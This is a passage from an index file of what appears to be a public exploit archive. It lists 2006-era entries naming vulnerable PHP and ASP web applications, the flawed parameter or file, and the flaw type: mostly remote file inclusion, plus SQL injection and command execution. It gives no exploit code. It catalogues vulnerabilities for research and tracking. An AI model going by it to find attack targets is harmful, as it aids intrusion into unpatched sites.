Inclusion",2006-08-10,Drago84,webapps,php,80 +2167,exploits/php/webapps/2167.txt,"SaveWebPortal 3.4 - 'page' Remote File Inclusion",2006-08-10,Bl0od3r,webapps,php, +2168,exploits/php/webapps/2168.txt,"phpPrintAnalyzer 1.2 - Remote File Inclusion",2006-08-10,Cmaster4,webapps,php,80 +2169,exploits/php/webapps/2169.txt,"Chaussette 080706 - '_BASE' Remote File Inclusion",2006-08-10,Drago84,webapps,php, +2170,exploits/php/webapps/2170.txt,"VWar 1.50 R14 - 'online.php' SQL Injection",2006-08-10,brOmstar,webapps,php, +2171,exploits/php/webapps/2171.txt,"WEBInsta MM 1.3e - 'cabsolute_path' Remote File Inclusion",2006-08-10,"Philipp Niedziela",webapps,php, +2172,exploits/php/webapps/2172.txt,"Mambo Component Remository 3.25 - Remote File Inclusion",2006-08-10,camino,webapps,php, +2173,exploits/php/webapps/2173.txt,"MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion",2006-08-10,Drago84,webapps,php, +2174,exploits/php/webapps/2174.txt,"Wheatblog 1.1 - 'session.php' Remote File Inclusion",2006-08-11,O.U.T.L.A.W,webapps,php,80 +2175,exploits/php/webapps/2175.txt,"WEBInsta CMS 0.3.1 - 'templates_dir' Remote File Inclusion",2006-08-12,K-159,webapps,php, +2177,exploits/php/webapps/2177.txt,"Joomla! Component Webring 1.0 - Remote File Inclusion",2006-08-13,"Mehmet Ince",webapps,php, +2178,exploits/php/webapps/2178.php,"XMB 1.9.6 Final - 'basename()' Remote Command Execution",2006-08-13,rgod,webapps,php, +2181,exploits/php/webapps/2181.pl,"PHPay 2.02 - 'nu_mail.inc.php?mail()' Remote Injection",2006-08-14,beford,webapps,php,80 +2182,exploits/php/webapps/2182.txt,"Mambo Component MMP 1.2 - Remote File Inclusion",2006-08-14,mdx,webapps,php, +2183,exploits/php/webapps/2183.txt,"ProjectButler 0.8.4 - 'rootdir' Remote File Inclusion",2006-08-14,"the master",webapps,php, +2184,exploits/php/webapps/2184.txt,"Mambo Component Peoplebook 1.0 - Remote File Inclusion",2006-08-14,Matdhule,webapps,php, +2186,exploits/asp/webapps/2186.txt,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (1)",2006-08-14,ASIANEAGLE,webapps,asp, +2187,exploits/php/webapps/2187.html,"WEBInsta MM 1.3e - 'absolute_path' Remote File Inclusion",2006-08-15,str0ke,webapps,php, +2188,exploits/php/webapps/2188.txt,"Discloser 0.0.4 - 'fileloc' Remote File Inclusion",2006-08-15,"Arash RJ",webapps,php, +2189,exploits/php/webapps/2189.txt,"WEBInsta CMS 0.3.1 - 'users.php' Remote File Inclusion",2006-08-15,Yns,webapps,php, +2190,exploits/php/webapps/2190.txt,"PHProjekt 5.1 - Multiple Remote File Inclusions",2006-08-15,Kacper,webapps,php, +2191,exploits/php/webapps/2191.txt,"dotProject 2.0.4 - 'baseDir' Remote File Inclusion",2006-08-16,Kacper,webapps,php, +2192,exploits/php/webapps/2192.txt,"OPT Max 1.2.0 - 'CRM_inc' Remote File Inclusion",2006-08-16,Kacper,webapps,php, +2196,exploits/php/webapps/2196.txt,"Mambo Component CopperminePhotoGalery - Remote File Inclusion",2006-08-16,k1tk4t,webapps,php, +2198,exploits/php/webapps/2198.php,"CubeCart 3.0.11 - 'oid' Blind SQL Injection",2006-08-17,rgod,webapps,php, +2199,exploits/php/webapps/2199.txt,"IRSR 0.2 - '_sysSessionPath' Remote File Inclusion",2006-08-17,Kacper,webapps,php, +2200,exploits/php/webapps/2200.txt,"WTcom 0.2.4-alpha - 'torrents.php' SQL Injection",2006-08-17,sh1r081,webapps,php, +2201,exploits/php/webapps/2201.txt,"POWERGAP 2003 - 's0x.php' Remote File Inclusion",2006-08-17,"Saudi Hackrz",webapps,php, +2202,exploits/php/webapps/2202.txt,"Mambo Component mambelfish 1.1 - Remote File Inclusion",2006-08-17,mdx,webapps,php, +2203,exploits/php/webapps/2203.txt,"Joomla! Component com_jim 1.0.1 - Remote File Inclusion",2006-08-17,"Mehmet Ince",webapps,php, +2205,exploits/php/webapps/2205.txt,"Joomla! Component Mosets Tree 1.0 - Remote File Inclusion",2006-08-17,Crackers_Child,webapps,php, +2206,exploits/php/webapps/2206.txt,"Mambo Component 'com_phpshop' 1.2 RC2b - Remote File Inclusion",2006-08-17,Cmaster4,webapps,php, +2207,exploits/php/webapps/2207.txt,"Mambo Component 'com_a6mambocredits' 1.0.0 - Remote File Inclusion",2006-08-17,Cmaster4,webapps,php, +2209,exploits/php/webapps/2209.txt,"Joomla! Component Artlinks 1.0b4 - Remote File Inclusion",2006-08-18,camino,webapps,php, +2211,exploits/php/webapps/2211.txt,"PHlyMail Lite 3.4.4 - 'mod.listmail.php' Remote File Inclusion",2006-08-18,Kacper,webapps,php, +2212,exploits/php/webapps/2212.txt,"phpCodeGenie 3.0.2 - 'BEAUT_PATH' Remote File Inclusion",2006-08-18,Kacper,webapps,php, +2213,exploits/php/webapps/2213.txt,"Mambo Component MamboWiki 0.9.6 - Remote File Inclusion",2006-08-18,camino,webapps,php, +2214,exploits/php/webapps/2214.txt,"Joomla! Component Link Directory 1.0.3 - Remote File Inclusion",2006-08-18,camino,webapps,php, +2215,exploits/php/webapps/2215.txt,"Joomla! Component Kochsuite 0.9.4 - Remote File Inclusion",2006-08-18,camino,webapps,php, +2216,exploits/php/webapps/2216.txt,"Sonium Enterprise Adressbook 0.2 - 'folder' Include",2006-08-18,"Philipp Niedziela",webapps,php, +2217,exploits/php/webapps/2217.txt,"Mambo Component cropimage 1.0 - Remote File Inclusion",2006-08-19,"Mehmet Ince",webapps,php, +2218,exploits/php/webapps/2218.txt,"Interact 2.2 - 'CONFIG[base_path]' Remote File Inclusion",2006-08-19,Kacper,webapps,php, +2219,exploits/php/webapps/2219.php,"Joomla! Component Poll 1.0.10 - Arbitrary Add Votes",2006-08-19,trueend5,webapps,php, +2220,exploits/php/webapps/2220.txt,"Tutti Nova 1.6 - 'TNLIB_DIR' Remote File Inclusion",2006-08-19,SHiKaA,webapps,php, +2221,exploits/php/webapps/2221.txt,"Fantastic News 2.1.3 - 'script_path' Remote File Inclusion",2006-08-19,SHiKaA,webapps,php, +2222,exploits/php/webapps/2222.txt,"Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion",2006-08-19,mdx,webapps,php, +2224,exploits/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,webapps,php, +2225,exploits/php/webapps/2225.txt,"Mambo Component bigAPE-Backup 1.1 - Remote File Inclusion",2006-08-19,mdx,webapps,php, +2226,exploits/php/webapps/2226.txt,"NES Game and NES System c108122 - Remote File Inclusion",2006-08-20,Kacper,webapps,php, +2227,exploits/php/webapps/2227.txt,"SportsPHool 1.0 - 'mainnav' Remote File Inclusion",2006-08-20,Kacper,webapps,php, +2228,exploits/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",webapps,asp, +2229,exploits/php/webapps/2229.txt,"Shadows Rising RPG 0.0.5b - Remote File Inclusion",2006-08-20,Kacper,webapps,php, +2230,exploits/asp/webapps/2230.txt,"LBlog 1.05 - 'comments.asp' SQL Injection",2006-08-20,"Chironex Fleckeri",webapps,asp, +2231,exploits/php/webapps/2231.php,"Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Local File Inclusion",2006-08-20,rgod,webapps,php, +2232,exploits/php/webapps/2232.pl,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)",2006-08-20,ASIANEAGLE,webapps,php, +2235,exploits/php/webapps/2235.txt,"PHProjekt 6.1 - 'path_pre' Multiple Remote File Inclusions",2006-08-21,"the master",webapps,php, +2236,exploits/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - 'folderprops.php' Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,webapps,php, +2239,exploits/php/webapps/2239.txt,"Empire CMS 3.7 - 'checklevel.php' Remote File Inclusion",2006-08-22,"Bob Linuson",webapps,php, +2240,exploits/php/webapps/2240.txt,"HPE 1.0 - HPEinc Remote File Inclusion (2)",2006-08-22,"the master",webapps,php, +2243,exploits/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics",2006-08-22,rgod,webapps,php, +2247,exploits/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,webapps,php, +2248,exploits/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - 'start' SQL Injection",2006-08-23,SpiderZ,webapps,php, +2249,exploits/php/webapps/2249.txt,"pSlash 0.7 - 'lvc_include_dir' Remote File Inclusion",2006-08-23,"Mehmet Ince",webapps,php, +2250,exploits/php/webapps/2250.pl,"Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion",2006-08-23,nukedx,webapps,php, +2251,exploits/php/webapps/2251.pl,"VistaBB 2.x - 'functions_mod_user.php' Remote File Inclusion",2006-08-23,nukedx,webapps,php, +2252,exploits/php/webapps/2252.pl,"Wikepage Opus 10 < 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,webapps,php, +2253,exploits/php/webapps/2253.php,"Phaos 0.9.2 - 'basename()' Remote Command Execution",2006-08-24,Kacper,webapps,php, +2254,exploits/php/webapps/2254.txt,"PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion",2006-08-24,Timq,webapps,php, +2255,exploits/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,webapps,php, +2256,exploits/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,webapps,php, +2257,exploits/php/webapps/2257.txt,"CliServ Web Community 0.65 - 'cl_headers' Include",2006-08-25,Kacper,webapps,php, +2259,exploits/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,webapps,php, +2260,exploits/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - 'PSA_PATH' Remote File Inclusion",2006-08-27,Kacper,webapps,php, +2261,exploits/php/webapps/2261.php,"iziContents RC6 - Remote Code Execution",2006-08-27,Kacper,webapps,php, +2262,exploits/php/webapps/2262.php,"CMS Frogss 0.4 - 'podpis' SQL Injection",2006-08-27,Kacper,webapps,php, +2263,exploits/php/webapps/2263.txt,"Ay System CMS 2.6 - 'main.php' Remote File Inclusion",2006-08-27,SHiKaA,webapps,php, +2266,exploits/cgi/webapps/2266.txt,"Cybozu Products - 'id' Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",webapps,cgi, +2267,exploits/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injections",2006-08-28,"Tan Chew Keong",webapps,cgi, +2268,exploits/php/webapps/2268.php,"e107 < 0.75 - GLOBALS Overwrite Remote Code Execution",2006-08-28,rgod,webapps,php, +2269,exploits/php/webapps/2269.txt,"Web3news 0.95 - 'PHPSECURITYADMIN_PATH' Remote File Inclusion",2006-08-28,SHiKaA,webapps,php, +2270,exploits/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution",2006-08-29,Kacper,webapps,php, +2271,exploits/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - 'chemin' Remote File Inclusion",2006-08-29,"Mehmet Ince",webapps,php, +2272,exploits/php/webapps/2272.txt,"MiniBill 1.22b - config[plugin_dir] Remote File Inclusion",2006-08-29,"the master",webapps,php, +2273,exploits/php/webapps/2273.txt,"ExBB Italiano 0.2 - exbb[home_path] Remote File Inclusion",2006-08-29,SHiKaA,webapps,php, +2275,exploits/php/webapps/2275.txt,"PHPECard 2.1.4 - 'functions.php' Remote File Inclusion",2006-08-29,LeAk,webapps,php, +2279,exploits/php/webapps/2279.txt,"phpAtm 1.21 - 'include_location' Remote File Inclusion",2006-08-30,KinSize,webapps,php, +2280,exploits/php/webapps/2280.pl,"Lanifex DMO 2.3b - '_incMgr' Remote File Inclusion",2006-08-30,Kacper,webapps,php, +2281,exploits/php/webapps/2281.pl,"Pheap CMS 1.1 - 'lpref' Remote File Inclusion",2006-08-31,Kacper,webapps,php, +2282,exploits/php/webapps/2282.txt,"YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion",2006-08-31,MATASANOS,webapps,php, +2285,exploits/php/webapps/2285.txt,"MyBace Light - 'login_check.php' Remote File",2006-09-01,"Philipp Niedziela",webapps,php, +2287,exploits/asp/webapps/2287.txt,"icblogger 2.0 - 'YID' SQL Injection",2006-09-01,"Chironex Fleckeri",webapps,asp, +2288,exploits/php/webapps/2288.php,"TikiWiki 1.9 Sirius - 'jhot.php' Remote Command Execution",2006-09-02,rgod,webapps,php, +2289,exploits/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,webapps,php, +2290,exploits/php/webapps/2290.txt,"Dyncms Release 6 - 'x_admindir' Remote File Inclusion",2006-09-02,SHiKaA,webapps,php, +2291,exploits/php/webapps/2291.php,"PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote Command Execution",2006-09-03,rgod,webapps,php, +2292,exploits/php/webapps/2292.txt,"Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion",2006-09-03,SHiKaA,webapps,php, +2293,exploits/php/webapps/2293.txt,"FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion",2006-09-04,NeXtMaN,webapps,php, +2294,exploits/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - 'tr' SQL Injection",2006-09-03,ASIANEAGLE,webapps,asp, +2295,exploits/php/webapps/2295.txt,"In-link 2.3.4 - 'ADODB_DIR' Remote File Inclusion",2006-09-04,"Saudi Hackrz",webapps,php, +2296,exploits/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,webapps,asp, +2297,exploits/php/webapps/2297.pl,"TR Forum 2.0 - SQL Injection / Bypass Security Restriction",2006-09-04,DarkFig,webapps,php, +2298,exploits/php/webapps/2298.php,"pHNews alpha 1 - 'templates_dir' Remote Code Execution",2006-09-04,Kacper,webapps,php, +2299,exploits/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,webapps,php, +2300,exploits/php/webapps/2300.pl,"SoftBB 0.1 - 'cmd' Remote Command Execution",2006-09-04,DarkFig,webapps,php, +2301,exploits/php/webapps/2301.txt,"MySpeach 3.0.2 - 'my_ms[root]' Remote File Inclusion",2006-09-05,SHiKaA,webapps,php, +2304,exploits/php/webapps/2304.txt,"GrapAgenda 0.1 - 'page' Remote File Inclusion",2006-09-05,"Kurdish Security",webapps,php, +2305,exploits/php/webapps/2305.txt,"AnnonceV News Script 1.1 - 'page' Remote File Inclusion",2006-09-05,"Kurdish Security",webapps,php, +2306,exploits/asp/webapps/2306.txt,"Zix Forum 1.12 - 'RepId' SQL Injection (1)",2006-09-05,"Chironex Fleckeri",webapps,asp, +2307,exploits/php/webapps/2307.txt,"ACGV News 0.9.1 - 'article.php' Remote File Inclusion",2006-09-05,SHiKaA,webapps,php, +2308,exploits/php/webapps/2308.txt,"C-News 1.0.1 - 'path' Remote File Inclusion",2006-09-05,SHiKaA,webapps,php, +2309,exploits/php/webapps/2309.txt,"Sponge News 2.2 - 'sndir' Remote File Inclusion",2006-09-05,SHiKaA,webapps,php, +2310,exploits/php/webapps/2310.php,"PhpCommander 3.0 - 'upload' Remote Code Execution",2006-09-05,Kacper,webapps,php, +2311,exploits/php/webapps/2311.txt,"phpBB Shadow Premod 2.7.1 - Remote File Inclusion",2006-09-06,Kw3[R]Ln,webapps,php, +2312,exploits/php/webapps/2312.txt,"BinGo News 3.01 - 'bnrep' Remote File Inclusion",2006-09-06,SHiKaA,webapps,php, +2313,exploits/php/webapps/2313.txt,"phpFullAnnu 5.1 - 'repmod' Remote File Inclusion",2006-09-06,SHiKaA,webapps,php, +2314,exploits/php/webapps/2314.txt,"Beautifier 0.1 - 'Core.php' Remote File Inclusion",2006-09-06,"the master",webapps,php, +2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,webapps,php, +2316,exploits/php/webapps/2316.txt,"PayProCart 1146078425 - Multiple Remote File Inclusions",2006-09-07,momo26,webapps,php, +2317,exploits/php/webapps/2317.txt,"SL_Site 1.0 - 'spaw_root' Remote File Inclusion",2006-09-07,Kw3[R]Ln,webapps,php, +2318,exploits/php/webapps/2318.txt,"Web Server Creator 0.1 - 'l' Remote File Inclusion",2006-09-07,"Mehmet Ince",webapps,php, +2319,exploits/php/webapps/2319.txt,"Fire Soft Board RC 3 - 'racine' Remote File Inclusion",2006-09-07,ddoshomo,webapps,php, +2321,exploits/php/webapps/2321.php,"DokuWiki 2006-03-09b - 'dwpage.php' Remote Code Execution",2006-09-07,rgod,webapps,php, +2322,exploits/php/webapps/2322.php,"DokuWiki 2006-03-09b - 'dwpage.php' System Disclosure",2006-09-07,rgod,webapps,php, +2323,exploits/php/webapps/2323.txt,"PhpNews 1.0 - 'Include' Remote File Inclusion",2006-09-07,"the master",webapps,php, +2324,exploits/php/webapps/2324.txt,"ACGV News 0.9.1 - 'header.php' Remote File Inclusion",2006-09-07,ddoshomo,webapps,php, +2325,exploits/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,webapps,php, +2326,exploits/php/webapps/2326.txt,"WM-News 0.5 - Multiple Remote File Inclusions",2006-09-07,ddoshomo,webapps,php, +2327,exploits/php/webapps/2327.txt,"PhotoKorn Gallery 1.52 - 'dir_path' Remote File Inclusion",2006-09-07,"Saudi Hackrz",webapps,php, +2329,exploits/php/webapps/2329.txt,"Somery 0.4.6 - 'skin_dir' Remote File Inclusion",2006-09-08,basher13,webapps,php, +2333,exploits/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - 'cookie' Remote Code Execution",2006-09-08,Kacper,webapps,php, +2335,exploits/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - 'base' Remote File Inclusion",2006-09-08,ddoshomo,webapps,php, +2336,exploits/php/webapps/2336.pl,"Socketwiz BookMarks 2.0 - 'root_dir' Remote File Inclusion",2006-09-09,Kacper,webapps,php, +2337,exploits/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - 'id' SQL Injection",2006-09-09,MercilessTurk,webapps,php, +2339,exploits/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - 'classified_path' File Inclusion",2006-09-09,MercilessTurk,webapps,php, +2340,exploits/php/webapps/2340.txt,"PUMA 1.0 RC 2 - 'config.php' Remote File Inclusion",2006-09-10,"Philipp Niedziela",webapps,php, +2341,exploits/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - 'ROOT_PATH' File Inclusion",2006-09-10,Eddy_BAck0o,webapps,php, +2342,exploits/php/webapps/2342.txt,"mcGalleryPRO 2006 - 'path_to_folder' Remote File Inclusion",2006-09-10,Solpot,webapps,php, +2343,exploits/php/webapps/2343.txt,"MiniPort@l 0.1.5 Beta - 'skiny' Remote File Inclusion",2006-09-11,Kacper,webapps,php, +2344,exploits/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - 'config' Remote File Inclusion",2006-09-11,basher13,webapps,php, +2346,exploits/php/webapps/2346.txt,"WTools 0.0.1a - 'INCLUDE_PATH' Remote File Inclusion",2006-09-11,ddoshomo,webapps,php, +2347,exploits/php/webapps/2347.txt,"PhpLinkExchange 1.0 - Include / Cross-Site Scripting",2006-09-11,s3rv3r_hack3r,webapps,php, +2348,exploits/php/webapps/2348.pl,"phpBB 2.0.21 - Poison Null Byte Remote File Upload",2006-09-11,ShAnKaR,webapps,php, +2349,exploits/php/webapps/2349.txt,"phpBB XS 0.58 - 'functions.php' Remote File Inclusion",2006-09-12,AzzCoder,webapps,php, +2350,exploits/php/webapps/2350.txt,"p4CMS 1.05 - 'abs_pfad' Remote File Inclusion",2006-09-12,SHiKaA,webapps,php, +2351,exploits/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,webapps,php, +2352,exploits/php/webapps/2352.txt,"webSPELL 4.01.01 - Database Backup Download",2006-09-12,Trex,webapps,php, +2353,exploits/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,webapps,php, +2354,exploits/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - 'dir_path' Remote File Inclusion",2006-09-12,SHiKaA,webapps,php, +2356,exploits/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - Remote File Inclusion",2006-09-13,mdx,webapps,php, +2357,exploits/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Remote File Inclusion",2006-09-13,Rivertam,webapps,php, +2359,exploits/php/webapps/2359.txt,"Downstat 1.8 - 'art' Remote File Inclusion",2006-09-13,SilenZ,webapps,php, +2361,exploits/php/webapps/2361.txt,"Shadowed Portal 5.599 - 'root' Remote File Inclusion",2006-09-13,mad_hacker,webapps,php, +2362,exploits/asp/webapps/2362.txt,"TualBLOG 1.0 - 'icerikno' SQL Injection",2006-09-13,RMx,webapps,asp, +2363,exploits/php/webapps/2363.tt,"Magic News Pro 1.0.3 - 'script_path' Remote File Inclusion",2006-09-13,"Saudi Hackrz",webapps,php, +2364,exploits/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - 'visEdit_root' Remote File Inclusion",2006-09-13,igi,webapps,php, +2365,exploits/php/webapps/2365.txt,"Newsscript 0.5 - Local/Remote File Inclusion",2006-09-13,"Daftrix Security",webapps,php, +2366,exploits/php/webapps/2366.txt,"phpQuiz 0.1 - 'pagename' Remote File Inclusion",2006-09-14,Solpot,webapps,php, +2367,exploits/php/webapps/2367.txt,"Mambo Component com_serverstat 0.4.4 - Remote File Inclusion",2006-09-14,"Mehmet Ince",webapps,php, +2368,exploits/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - 'app_root' Remote File Inclusion",2006-09-14,PSYCH@,webapps,php, +2369,exploits/php/webapps/2369.txt,"PhotoPost 4.6 - 'PP_PATH' Remote File Inclusion",2006-09-15,"Saudi Hackrz",webapps,php, +2370,exploits/php/webapps/2370.php,"Limbo CMS 1.0.4.2L - 'com_contact' Remote Code Execution",2006-09-15,rgod,webapps,php, +2371,exploits/asp/webapps/2371.txt,"Haberx 1.02 < 1.1 - 'tr' SQL Injection",2006-09-15,"Fix TR",webapps,asp, +2372,exploits/php/webapps/2372.txt,"BolinOS 4.5.5 - 'gBRootPath' Remote File Inclusion",2006-09-15,"Mehmet Ince",webapps,php, +2373,exploits/php/webapps/2373.txt,"PHP DocWriter 0.3 - 'script' Remote File Inclusion",2006-09-15,Kacper,webapps,php, +2374,exploits/php/webapps/2374.pl,"Site@School 2.4.02 - Arbitrary File Upload",2006-09-15,simo64,webapps,php, +2375,exploits/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) - Remote File Inclusion",2006-09-15,3l3ctric-Cracker,webapps,php, +2376,exploits/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution",2006-09-16,simo64,webapps,php, +2377,exploits/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion",2006-09-16,NeXtMaN,webapps,php, +2378,exploits/php/webapps/2378.php,"GNUTURK 2G - 't_id' SQL Injection",2006-09-16,p2y,webapps,php, +2379,exploits/php/webapps/2379.txt,"Mambo Component com_registration_detailed 4.1 - Remote File Inclusion",2006-09-16,k1tk4t,webapps,php, +2380,exploits/php/webapps/2380.txt,"UNAK-CMS 1.5 - 'dirroot' Remote File Inclusion",2006-09-16,SHiKaA,webapps,php, +2381,exploits/php/webapps/2381.txt,"guanxiCRM Business Solution 0.9.1 - Remote File Inclusion",2006-09-16,SHiKaA,webapps,php, +2382,exploits/php/webapps/2382.pl,"Zix Forum 1.12 - 'RepId' SQL Injection (2)",2006-09-17,SlimTim10,webapps,php, +2383,exploits/php/webapps/2383.txt,"MobilePublisherPHP 1.5 RC2 - Remote File Inclusion",2006-09-17,Timq,webapps,php, +2384,exploits/asp/webapps/2384.txt,"Q-Shop 3.5 - 'browse.asp' SQL Injection",2006-09-17,ajann,webapps,asp, +2385,exploits/asp/webapps/2385.txt,"Techno Dreams FAQ Manager 1.0 - SQL Injection",2006-09-17,ajann,webapps,asp, +2386,exploits/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - SQL Injection",2006-09-17,ajann,webapps,asp, +2387,exploits/asp/webapps/2387.txt,"Charon Cart 3.0 - 'Review.asp' SQL Injection",2006-09-17,ajann,webapps,asp, +2388,exploits/php/webapps/2388.txt,"CMtextS 1.0 - '/users_logins/admin.txt' Credentials Disclosure",2006-09-17,Kacper,webapps,php, +2389,exploits/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,webapps,php, +2390,exploits/php/webapps/2390.txt,"PNPHPBB2 < 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,webapps,php, +2391,exploits/php/webapps/2391.php,"Exponent CMS 0.96.3 - 'view' Remote Command Execution",2006-09-19,rgod,webapps,php, +2392,exploits/php/webapps/2392.txt,"Pie Cart Pro - 'Home_Path' Remote File Inclusion",2006-09-19,"Saudi Hackrz",webapps,php, +2393,exploits/php/webapps/2393.txt,"Pie Cart Pro - 'Inc_Dir' Remote File Inclusion",2006-09-19,SnIpEr_SA,webapps,php, +2394,exploits/php/webapps/2394.php,"more.groupware 0.74 - 'new_calendarid' SQL Injection",2006-09-19,x128,webapps,php, +2395,exploits/asp/webapps/2395.txt,"Tekman Portal 1.0 - 'tr' SQL Injection",2006-09-19,"Fix TR",webapps,asp, +2396,exploits/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Inclusion",2006-09-19,CeNGiZ-HaN,webapps,php, +2397,exploits/php/webapps/2397.py,"MyReview 1.9.4 - 'email' SQL Injection / Code Execution",2006-09-19,STILPU,webapps,php, +2398,exploits/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusions",2006-09-19,ajann,webapps,php, +2399,exploits/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,webapps,php, +2402,exploits/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - Cross-Site Scripting / SQL Injection Code Execution",2006-09-20,Kacper,webapps,php, +2405,exploits/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Remote File Inclusion",2006-09-20,Br@Him,webapps,php, +2406,exploits/php/webapps/2406.php,"exV2 < 2.0.4.3 - 'sort' SQL Injection",2006-09-21,rgod,webapps,php, +2407,exploits/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Remote File Inclusion",2006-09-21,CvIr.System,webapps,php, +2409,exploits/php/webapps/2409.txt,"PHPartenaire 1.0 - 'dix.php3' Remote File Inclusion",2006-09-21,DaDIsS,webapps,php, +2410,exploits/php/webapps/2410.txt,"phpQuestionnaire 3.12 - 'phpQRootDir' Remote File Inclusion",2006-09-21,Solpot,webapps,php, +2411,exploits/php/webapps/2411.pl,"ProgSys 0.156 - 'RR.php' Remote File Inclusion",2006-09-21,Kacper,webapps,php, +2413,exploits/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusions",2006-09-21,Kacper,webapps,php, +2414,exploits/php/webapps/2414.txt,"Wili-CMS 0.1.1 - Remote File Inclusion / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",webapps,php, +2415,exploits/php/webapps/2415.php,"exV2 < 2.0.4.3 - 'extract()' Remote Command Execution",2006-09-22,rgod,webapps,php, +2416,exploits/asp/webapps/2416.txt,"xweblog 2.1 - 'kategori.asp' SQL Injection",2006-09-22,Muhacir,webapps,asp, +2417,exploits/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - 'index.php' SQL Injection",2006-09-22,"HACKERS PAL",webapps,php, +2418,exploits/php/webapps/2418.php,"e-Vision CMS 2.0 - 'all_users.php' SQL Injection",2006-09-22,"HACKERS PAL",webapps,php, +2419,exploits/php/webapps/2419.txt,"Web-News 1.6.3 - 'template.php' Remote File Inclusion",2006-09-24,Drago84,webapps,php, +2420,exploits/php/webapps/2420.txt,"ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion",2006-09-24,Drago84,webapps,php, +2421,exploits/asp/webapps/2421.pl,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)",2006-09-24,gega,webapps,asp, +2422,exploits/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - 'mcf.php' Remote File Inclusion",2006-09-24,xdh,webapps,php, +2423,exploits/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - SQL Injection",2006-09-24,"Fix TR",webapps,asp, +2424,exploits/php/webapps/2424.txt,"SyntaxCMS 1.3 - '0004_init_urls.php' Remote File Inclusion",2006-09-24,MoHaJaLi,webapps,php, +2427,exploits/php/webapps/2427.txt,"Polaring 0.04.03 - 'general.php' Remote File Inclusion",2006-09-25,Drago84,webapps,php, +2428,exploits/php/webapps/2428.txt,"PBLang 4.66z - 'temppath' Remote File Inclusion",2006-09-25,SHiKaA,webapps,php, +2429,exploits/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion",2006-09-25,SHiKaA,webapps,php, +2431,exploits/php/webapps/2431.txt,"evoBB 0.3 - 'path' Remote File Inclusion",2006-09-25,SHiKaA,webapps,php, 